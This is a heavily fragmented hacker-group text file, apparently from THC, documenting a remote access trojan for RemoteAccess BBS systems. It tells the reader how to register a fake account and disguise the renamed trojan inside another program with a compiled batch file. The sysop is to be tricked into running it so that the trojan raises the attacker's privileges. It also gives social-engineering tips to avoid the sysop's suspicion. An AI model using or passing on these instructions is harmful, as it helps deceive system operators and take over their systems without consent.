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^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-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^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-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Disclaimer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What's new &amp;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Notes, gree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^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^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          Introduction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-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-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AL ERROR's REMOTE ACCESS TROJAN v0.2�     (by Fatal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wanted to make a trojan for RA a long time ago. I made on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 and I kept it only for myself and a friend or two. Then, abou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wo before the THC-RAHK package was released (which is really great!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my trojan too, but later I found out that I released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jan. Well everything was fine except the strings of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and the hackers account on the board. I dunno how they fucked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xed it anyway. Now it works great (I tested it on my PC and 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does : It checks for all USERS.BBS files on the disk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s, security and credits of your account there according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one. The only problem is that the sysop must run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as passed since then. Now, the week before christmas, THC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lease their 2nd RAHK package :) Well, this is a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K package. Hope vanHauser won't kick my DOC hehe ...   [happy now? ;-) v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^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^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        Disclaimer &amp; Copyright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-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-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 the author, take no responsibility for whatever is done with t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ork. Any loss of data, HD crash, criminal actions, fucking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atsoever this program might do is NOT my fault. I do not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(ab)use it. Remember, it is only made for sysops for securit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))) Yeah, right that is all I will say about it. Now to the copyr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program in whatever way you like and change i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n't distribute the changed version. I encourage you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uff. So it's all min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said, I support distributing it. So here it goe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RAH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^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^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          How to use it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-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-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ll in all, this is really simple :) What you have to do i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sysops account on the BBS and get another accoun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o set all the priviledges to. I recomend you to mak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account with false info :) After you get these two names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.EXE program. It will ask you for the sysops and the oth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ard. Type them. It will create an INCLUDE.DAT fi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names in it, crypted a little, not to make it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 the other strings like USERS.BBS are crypted too :) The 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really primitive, but what the hell, the result is no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trings. You can read the INCLUDE.DAT with the INCLUD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is part is left to you. You must have some imagination ;)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make the sysop to run your program. So, put the RATROJAN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program (renamed, of course). You MUST have the INCLU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ATROJAN.EXE in the same directory. An example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ME.EXE      (this is your RATROJAN.EXE ren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is is possible (and most times even better).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you would be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COM       (a batch file compiled to a C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1.DAT      (the RATROJA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2.DAT      (the RE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.DAT    (MUST HA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DOC       (som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LIST.COM will be a batch file compiled to a COM. It should cont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Please wait while lo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 MAIN1.DAT MAIN1.EXE           ; Make RATROJAN.EX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1.EXE                         ;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 MAIN1.EXE MAIN1.DAT           ; Get it to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 MAIN2.DAT MAIN2.EXE           ; Make the REAL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2.EXE                         ;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 MAIN2.EXE MAIN2.DAT           ; Get it to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you get the idea. I included a BAT to COM convertor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. But it doesn't hide what is writen in the batch file, s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to compress/encrypt it, like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ice : If you create a false user, first DL some files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ch the ratio (if it is easy reachable) and then send this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ratios then first DL some files and post a message or tw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spicious to the sysop. Because most of the sysops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is wrong if you call one time and UL a f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^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^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        What's new &amp; feauture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-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-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is to fix a MAJOR bug in the first one. Well, I sai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beta ;) I corrected this bug and now it works fine (or at le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on my PC). Basically, theres almost nothing new, just it'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able :) I wanted to add support for scanning through other driv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didn't have the time and the routine made was still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through all the drives/partitions. That is my plan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rogram. In this release I made the INCLUDE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R.EXE a little more user-friendly :) I also completely rewr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It seems that I made it shitty too. This one is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ye. For example I took THC's documentations, I hope that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ngry for this ;)  [what? all our docs look like shit - I thin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search for Doc-writers &amp; beautfiers ... v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^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^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        Notes, greetings etc.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-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-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, I would like to appologise to all of you which us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ot no results :( And I am sorry for not including the multi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n this release, although I promised it to some dudes. I promi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lude it in the next (if something unexpectant doesn't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^ Greetings go out to : ^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^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er        - Kewlest hacker I ever knew ;) Keep up the good wor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back soon &amp; hope u'r having a good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ua Five    - He's very absent lately. The combination of girfriend &amp; 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 pretty ba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rus         - Hasty dude ;) Kewl cha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Fonk        - A great friend of mine. If you wanna help him, hire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1          - Sorry you didn't come :( Maybe anoth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mav       - Happy box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venger      - I wanna tell ya something 'bout your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Hauser     - THC RuLeZ !!! Keep it going d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taire       - Still remember what country I am from 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lly Roger    - Dial-o-Mat programer. Pity I can't see your program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walker      - Your idea with the RA virii is kewl, but looks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work :( Two people said that they had a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sh with it. Hope it is better in this package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all the others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_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-^-_-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coments, bug-reports, ideas for improvements, chat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m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err@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my PGP key. Use it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H3aqUAAAEEANSek06HkhDe9nNMlvFIQBRgSfQ81LrRzuM65NZSMm4Y21u5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ZIyrfc36cbVA6US4a82gbW07QX3lYHEO8eEIQVvxFnK75MPoQ815v1mbti/JY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jot2EnvuLbQOCvqIvN1EYDCrWixyOKHG7hewnR9YAQs0NXl+T5hp5ork5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GYXRhbCBFcnJvc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YcV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tal Error / THC / Immor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